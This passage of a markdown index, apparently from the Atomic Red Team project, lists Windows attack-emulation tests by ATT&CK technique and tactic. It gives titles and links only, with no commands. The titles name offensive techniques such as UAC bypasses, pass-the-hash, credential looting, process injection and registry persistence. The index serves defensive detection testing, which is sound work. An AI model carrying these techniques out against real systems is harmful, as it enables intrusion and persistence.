- Atomic Test #5: Regsvr32 Silent DLL Install Call DllRegisterServer [windows]
- [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #1: Masquerading as Windows LSASS process [windows]
- Atomic Test #3: Masquerading - cscript.exe running as notepad.exe [windows]
- Atomic Test #4: Masquerading - wscript.exe running as svchost.exe [windows]
- Atomic Test #5: Masquerading - powershell.exe running as taskhostw.exe [windows]
- Atomic Test #6: Masquerading - non-windows exe running as windows exe [windows]
- Atomic Test #7: Masquerading - windows exe running as different windows exe [windows]
- Atomic Test #8: Malicious process Masquerading as LSM.exe [windows]
- Atomic Test #9: File Extension Masquerading [windows]
- T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1186 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1218.009 Signed Binary Proxy Execution: Regsvcs/Regasm](../../T1218.009/T1218.009.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvcs Uninstall Method Call Test [windows]
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #4: Install root CA on Windows [windows]
- Atomic Test #5: Install root CA on Windows with certutil [windows]
- Atomic Test #6: Add Root Certificate to CurrentUser Certificate Store [windows]
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #1: Compile After Delivery using csc.exe [windows]
- Atomic Test #2: Dynamic C# Compile [windows]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
- Atomic Test #4: Bits download using desktopimgdownldr.exe (cmd) [windows]
- [T1127.001 Trusted Developer Utilities Proxy Execution: MSBuild](../../T1127.001/T1127.001.md)
- Atomic Test #1: MSBuild Bypass Using Inline Tasks (C#) [windows]
- Atomic Test #2: MSBuild Bypass Using Inline Tasks (VB) [windows]
- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.003 Hide Artifacts: Hidden Window](../../T1564.003/T1564.003.md)
- Atomic Test #1: Hidden Window [windows]
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1223 Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.006 HTML Smuggling](../../T1027.006/T1027.006.md)
- Atomic Test #1: HTML Smuggling Remote Payload [windows]
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #4: Delete a single file - Windows cmd [windows]
- Atomic Test #5: Delete an entire folder - Windows cmd [windows]
- Atomic Test #6: Delete a single file - Windows PowerShell [windows]
- Atomic Test #7: Delete an entire folder - Windows PowerShell [windows]
- Atomic Test #9: Delete Prefetch File [windows]
- Atomic Test #10: Delete TeamViewer Log Files [windows]
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1221 Template Injection](../../T1221/T1221.md)
- Atomic Test #1: WINWORD Remote Template Injection [windows]
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.002 Obfuscated Files or Information: Software Packing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1550.002 Use Alternate Authentication Material: Pass the Hash](../../T1550.002/T1550.002.md)
- Atomic Test #1: Mimikatz Pass the Hash [windows]
- Atomic Test #2: crackmapexec Pass the Hash [windows]
- Atomic Test #3: Invoke-WMIExec Pass the Hash [windows]
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- T1126 Network Share Connection Removal [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.007 Dynamic API Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1220 XSL Script Processing](../../T1220/T1220.md)
- Atomic Test #1: MSXSL Bypass using local files [windows]
- Atomic Test #2: MSXSL Bypass using remote files [windows]
- Atomic Test #3: WMIC bypass using local XSL file [windows]
- Atomic Test #4: WMIC bypass using remote XSL file [windows]
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #3: Create Windows System File with Attrib [windows]
- Atomic Test #4: Create Windows Hidden File with Attrib [windows]
- Atomic Test #8: Hide Files Through Registry [windows]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.004 Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md)
- Atomic Test #1: Alternate Data Streams (ADS) [windows]
- Atomic Test #2: Store file in Alternate Data Stream (ADS) [windows]
- Atomic Test #3: Create ADS command prompt [windows]
- Atomic Test #4: Create ADS PowerShell [windows]
- T1096 NTFS File Attributes [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1216 Signed Script Proxy Execution](../../T1216/T1216.md)
- Atomic Test #1: SyncAppvPublishingServer Signed Script PowerShell Command Execution [windows]
- Atomic Test #2: manage-bde.wsf Signed Script Command Execution [windows]
- T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1127 Trusted Developer Utilities Proxy Execution](../../T1127/T1127.md)
- Atomic Test #1: Lolbin Jsc.exe compile javascript to exe [windows]
- Atomic Test #2: Lolbin Jsc.exe compile javascript to dll [windows]
- T1218.014 MMC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.010 Process Argument Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
# privilege-escalation
- T1055.011 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
- Atomic Test #9: PowerShell Modify A Scheduled Task [windows]
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.013 Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control](../../T1548.002/T1548.002.md)
- Atomic Test #1: Bypass UAC using Event Viewer (cmd) [windows]
- Atomic Test #2: Bypass UAC using Event Viewer (PowerShell) [windows]
- Atomic Test #3: Bypass UAC using Fodhelper [windows]
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
- Atomic Test #8: Disable UAC using reg.exe [windows]
- Atomic Test #9: Bypass UAC using SilentCleanup task [windows]
- Atomic Test #10: UACME Bypass Method 23 [windows]
- Atomic Test #11: UACME Bypass Method 31 [windows]
- Atomic Test #12: UACME Bypass Method 33 [windows]
- Atomic Test #13: UACME Bypass Method 34 [windows]
- Atomic Test #14: UACME Bypass Method 39 [windows]
- Atomic Test #15: UACME Bypass Method 56 [windows]
- Atomic Test #16: UACME Bypass Method 59 [windows]
- Atomic Test #17: UACME Bypass Method 61 [windows]
- Atomic Test #18: WinPwn - UAC Magic [windows]
- Atomic Test #19: WinPwn - UAC Bypass ccmstp technique [windows]
- Atomic Test #20: WinPwn - UAC Bypass DiskCleanup technique [windows]
- Atomic Test #21: WinPwn - UAC Bypass DccwBypassUAC technique [windows]
- Atomic Test #22: Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key [windows]
- Atomic Test #23: UAC Bypass with WSReset Registry Modification [windows]
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- T1178 SID-History Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
- Atomic Test #1: Add a driver [windows]
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
- T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- Atomic Test #5: Remote Service Installation CMD [windows]
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.003 Thread Execution Hijacking](../../T1055.003/T1055.003.md)
- Atomic Test #1: Thread Execution Hijacking [windows]
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1547.010 Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- [T1055 Process Injection](../../T1055/T1055.md)
- Atomic Test #1: Shellcode execution via VBA [windows]
- Atomic Test #2: Remote Process Injection in LSASS via mimikatz [windows]
- Atomic Test #3: Section View Injection [windows]
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1050 New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.009 Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1181 Extra Window Memory Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- [T1484.001 Domain Policy Modification: Group Policy Modification](../../T1484.001/T1484.001.md)
- Atomic Test #1: LockBit Black - Modify Group policy settings -cmd [windows]
- Atomic Test #2: LockBit Black - Modify Group policy settings -Powershell [windows]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
- Atomic Test #1: Create a new time provider [windows]
- Atomic Test #2: Edit an existing time provider [windows]
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.002 Create Process with Token](../../T1134.002/T1134.002.md)
- Atomic Test #1: Access Token Manipulation [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique [windows]
- [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
- Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
- Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
- [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
- T1055.013 Process Doppelgänging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
- Atomic Test #1: Process Injection via C# [windows]
- T1138 Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
- Atomic Test #1: Create registry persistence via AppCert DLL [windows]
- T1055.002 Portable Executable Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1134.001 Access Token Manipulation: Token Impersonation/Theft](../../T1134.001/T1134.001.md)
- Atomic Test #1: Named pipe client impersonation [windows]
- Atomic Test #2: `SeDebugPrivilege` token duplication [windows]
- Atomic Test #3: Launch NSudo Executable [windows]
- Atomic Test #4: Bad Potato [windows]
- T1134.003 Make and Impersonate Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
- Atomic Test #2: Persistence via WMI Event Subscription - ActiveScriptEventConsumer [windows]
- Atomic Test #3: Windows MOFComp.exe Load MOF File [windows]
- [T1134.004 Access Token Manipulation: Parent PID Spoofing](../../T1134.004/T1134.004.md)
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
- Atomic Test #2: Parent PID Spoofing - Spawn from Current Process [windows]
- Atomic Test #3: Parent PID Spoofing - Spawn from Specified Process [windows]
- Atomic Test #4: Parent PID Spoofing - Spawn from svchost.exe [windows]
- Atomic Test #5: Parent PID Spoofing - Spawn from New Process [windows]
- [T1546.001 Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1015 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1502 Parent PID Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
  - Atomic Test #8: Add persistence via Recycle bin [windows]
- Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
- Atomic Test #10: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value [windows]
- Atomic Test #11: Change Startup Folder - HKCU Modify User Shell Folders Startup Value [windows]
- Atomic Test #12: HKCU - Policy Settings Explorer Run Key [windows]
- Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
- Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
- Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value [windows]
- Atomic Test #16: secedit used to create a Run key in the HKLM Hive [windows]
- Atomic Test #17: Modify BootExecute Value [windows]
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
- Atomic Test #4: WMI Invoke-CimMethod Start Process [windows]
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
- Atomic Test #1: Injection SID-History with mimikatz [windows]
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
- Atomic Test #1: Authentication Package [windows]
- [T1546.015 Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md)
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
- Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1034 Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.002 Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- [T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.008 Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md)
- Atomic Test #1: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt [windows]
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
- [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #6: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #7: WinPwn - Loot local Credentials - Safetykatz [windows]
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
# execution
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
- Atomic Test #9: PowerShell Modify A Scheduled Task [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
- Atomic Test #3: WMI Reconnaissance Software [windows]
- Atomic Test #4: WMI Reconnaissance List Remote Services [windows]
- Atomic Test #5: WMI Execute Local Process [windows]
- Atomic Test #6: WMI Execute Remote Process [windows]
- Atomic Test #7: Create a Process using WMI Query and an Encoded Command [windows]
- Atomic Test #8: Create a Process using obfuscated Win32_Process [windows]
- Atomic Test #9: WMI Execute rundll32 [windows]
- Atomic Test #10: Application uninstall using WMIC [windows]
- T1129 Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.007 Command and Scripting Interpreter: JavaScript](../../T1059.007/T1059.007.md)
- Atomic Test #1: JScript execution to gather local computer information via cscript [windows]
- Atomic Test #2: JScript execution to gather local computer information via wscript [windows]
- T1121 Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1559.002 Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md)
- Atomic Test #1: Execute Commands [windows]
- Atomic Test #2: Execute PowerShell script via Word DDE [windows]
- Atomic Test #3: DDEAUTO [windows]
- [T1204.002 User Execution: Malicious File](../../T1204.002/T1204.002.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- Atomic Test #2: OSTap Payload Download [windows]
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- Atomic Test #5: Office launching .bat file from AppData [windows]
- Atomic Test #6: Excel 4 Macro [windows]
- Atomic Test #7: Headless Chrome code execution via VBA [windows]
- Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
- Atomic Test #9: Office Generic Payload Download [windows]
- Atomic Test #10: LNK Payload Download [windows]
- Atomic Test #11: Mirror Blast Emulation [windows]
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique [windows]
- Atomic Test #3: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique [windows]
